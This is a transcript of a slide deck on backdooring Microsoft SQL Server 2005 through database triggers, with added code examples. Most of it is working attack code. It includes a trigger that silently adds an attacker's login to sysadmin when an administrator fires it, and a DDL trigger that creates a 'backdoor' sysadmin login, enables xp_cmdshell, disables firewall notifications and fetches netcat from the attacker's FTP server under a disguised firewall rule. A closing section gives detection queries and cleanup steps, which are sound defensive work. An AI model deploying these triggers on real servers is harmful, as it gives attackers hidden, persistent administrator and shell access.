Duong Ngo October 14, 2009

MSSql server 2005 backdoor

Jan 13, 2016


Transcript
Page 1: MSSql server 2005 backdoor

Duong Ngo October 14, 2009

Page 2

POST-EXPLOITATION

Got access to an MSSQL box (via SQL injection, brute force, ...)?

Privileges: sa / dbo / normal user

Dumped all the data

Now what's next?

Page 3

Backdoors

Provide easier access to the compromised box in the future

Types of backdoors: OS backdoors (rootkits), web server backdoors (PHPshell, CGITelnet, ...)

So what about a database backdoor? Yes, that works too!

Page 4

SQL Server 2005 Backdoor

We'll build a backdoor out of a SQL Server trigger.

What is a trigger?

Page 5

Database Trigger

A special kind of stored procedure that executes automatically when a user runs the specified data-modification statement (INSERT, UPDATE, DELETE) against the specified table. SQL Server 2005 also has DDL triggers, which fire on CREATE, ALTER and DROP statements at database or server scope.

By default a trigger executes under the security context of the user whose statement caused it to fire, not of the user who created it!

Page 6

EXAMPLE – Create trigger

Context: a normal database user who can create a trigger on the table (CREATE TRIGGER on a table requires ALTER permission on that table). The login to be promoted, Hacker, must already exist:

CREATE TRIGGER trg_gain_privilege ON tblCustomers FOR INSERT, DELETE, UPDATE
AS
EXEC sp_addsrvrolemember @loginame = N'Hacker', @rolename = N'sysadmin'

Page 7

EXAMPLE – Trigger gets fired

Context: sa (server admin) runs an ordinary statement against the table:

sa> DELETE FROM tblCustomers

RESULT?? The trigger runs in sa's context, so sp_addsrvrolemember succeeds and login 'Hacker' is now a member of sysadmin. (Had a non-sysadmin user fired it, sp_addsrvrolemember would have failed, the error would have rolled back that user's statement, and the trigger would have been noticed.)
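The escalation on slides 6 and 7 written out end to end, as an added example (mine, not the deck's own code). It keeps the deck's names (dbo.tblCustomers, login Hacker) and assumes that login already exists and that the low-privileged user holds ALTER on the table, which is what CREATE TRIGGER on a table requires. Unlike the slide version it only calls sp_addsrvrolemember when the firing statement actually ran as a sysadmin: for any other caller the procedure would raise an error, roll back that caller's INSERT, UPDATE or DELETE, and expose the trigger.

```sql
-- Added example (not the deck's code).  Assumes dbo.tblCustomers exists and
-- that a login named Hacker already exists and is controlled by the attacker.

-- Step 1: run as the low-privileged database user (needs ALTER on dbo.tblCustomers).
CREATE TRIGGER dbo.trg_gain_privilege
ON dbo.tblCustomers
AFTER INSERT, UPDATE, DELETE
AS
BEGIN
    SET NOCOUNT ON;
    -- The trigger runs as the caller (EXECUTE AS CALLER is the default), so
    -- IS_SRVROLEMEMBER reports the caller's membership.  Do nothing, and raise
    -- nothing, unless the caller is a sysadmin and the escalation is still pending;
    -- a failing sp_addsrvrolemember would roll back the caller's statement.
    IF IS_SRVROLEMEMBER(N'sysadmin') = 1
       AND ISNULL(IS_SRVROLEMEMBER(N'sysadmin', N'Hacker'), 0) = 0
    BEGIN
        EXEC sys.sp_addsrvrolemember @loginame = N'Hacker', @rolename = N'sysadmin';
    END
END;
GO

-- Step 2: any routine INSERT/UPDATE/DELETE run by sa (or another sysadmin) fires
-- the trigger in that caller's context.  The slide's DELETE is used here, so in a
-- lab this empties the table.
DELETE FROM dbo.tblCustomers;
GO

-- Step 3: reconnect as Hacker (role membership is picked up on a new connection)
-- and confirm the escalation; this returns 1 once the trigger has fired.
SELECT IS_SRVROLEMEMBER(N'sysadmin') AS i_am_sysadmin;
GO
```

Because the guard is evaluated inside the trigger, non-sysadmin callers see no error and no change in behaviour, which is the property the deck asks for on slide 9 ("execute subsequent commands if current user is 'sa'").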

Page 8

What can we do with that?

- Privilege escalation: normal user -> higher role
- Database backdoor

Page 9

SQLServer Backdoor features:

- Execute the subsequent commands only if the current user is 'sa'
- Enable xp_cmdshell
- Create a new login 'backdoor' and add it to the sysadmin server role
- Disable firewall notification mode
- Add ftp to the allowed programs list
- Get netcat from the attacker's ftp server
- Create a directory 'Backdoor_activated' on the attacker's ftp server to let the attacker know whenever the backdoor has been started
- Open netcat in listen mode attached to the SQL command-line client osql

Page 10

Our Backdoor’s Code

CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ;
EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename = N'sysadmin'
-- disable firewall notification mode
Exec master..xp_cmdshell 'netsh firewall set notifications disable'
…..

Note that the login is created as [backdoor] but added to the role as N'Backdoor'; the two names only match on a server with a case-insensitive collation.

Page 11

Why DDL_DATABASE_LEVEL_EVENTS? Because it is an event group covering all of the database-level DDL events below, so the trigger fires on any of them:

CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW

CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION

CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER

DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION

….….

Page 12

Our Backdoor's Code (cont)

-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- After getting netcat, add netcat to the firewall's allowedprogram list
-- (the rule is registered under the innocuous name "Printer")
SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\' + @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'
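For the defender's side, an added example (mine, not the deck's): queries that find both kinds of trigger the deck uses (DML triggers on tables, and database- or server-scoped DDL triggers) whose body reaches for the procedures a trigger backdoor relies on, plus checks of the persistence the slides leave behind (xp_cmdshell enabled, an extra sysadmin member). The trigger and login names in the cleanup step are the deck's own; the LIKE patterns are a starting point to adjust for your environment.

```sql
-- Added example (not the deck's code).  Run as sysadmin in each user database.

-- 1. DML triggers and database-scoped DDL triggers whose definition calls the
--    procedures a trigger backdoor needs.  parent_class 0 = database (DDL trigger),
--    1 = object (DML trigger on a table or view).
SELECT t.name,
       t.parent_class_desc,
       OBJECT_NAME(t.parent_id) AS parent_object,   -- NULL for DDL triggers
       t.is_disabled,
       t.create_date,
       t.modify_date,
       m.definition
FROM sys.triggers AS t
LEFT JOIN sys.sql_modules AS m ON m.object_id = t.object_id
WHERE m.definition LIKE N'%xp_cmdshell%'
   OR m.definition LIKE N'%sp_addsrvrolemember%'
   OR m.definition LIKE N'%sp_addrolemember%'
   OR m.definition LIKE N'%CREATE LOGIN%'
   OR m.definition LIKE N'%sp_configure%';

-- 2. Server-scoped DDL triggers (these fire regardless of database), same checks.
SELECT t.name, t.is_disabled, t.create_date, m.definition
FROM sys.server_triggers AS t
LEFT JOIN sys.server_sql_modules AS m ON m.object_id = t.object_id
WHERE m.definition LIKE N'%xp_cmdshell%'
   OR m.definition LIKE N'%sp_addsrvrolemember%'
   OR m.definition LIKE N'%CREATE LOGIN%';

-- 3. Persistence the slides describe: xp_cmdshell switched on, and unexpected
--    sysadmin members (slide 10 creates a login named backdoor).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'show advanced options');

SELECT member.name AS login_name, member.type_desc, member.create_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS role   ON role.principal_id   = rm.role_principal_id
JOIN sys.server_principals AS member ON member.principal_id = rm.member_principal_id
WHERE role.name = N'sysadmin'
ORDER BY member.create_date DESC;

-- 4. Cleanup for the deck's artefacts, once the findings above are confirmed.
--    Order matters: DROP TRIGGER is itself a DDL_DATABASE_LEVEL_EVENTS event, so
--    dropping trg_backdoor fires it one last time in the cleaning sysadmin's
--    context.  Turn xp_cmdshell off first so that final run cannot reach the OS,
--    then drop the triggers, then remove the login it may have re-created.
EXEC sys.sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sys.sp_configure N'xp_cmdshell', 0;
RECONFIGURE;

DROP TRIGGER trg_backdoor ON DATABASE;
DROP TRIGGER dbo.trg_gain_privilege;

EXEC sys.sp_dropsrvrolemember @loginame = N'backdoor', @rolename = N'sysadmin';
DROP LOGIN [backdoor];
```

The definition search is deliberately crude (plain LIKE on the module text); a backdoor that builds its procedure names at runtime, as slide 12's @cmd string concatenation does for the OS commands, will not match a fixed pattern, so treat any trigger on a DDL event group or on a sensitive table as worth reading in full rather than relying on the patterns alone.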

Page 13

Thank You for listening!!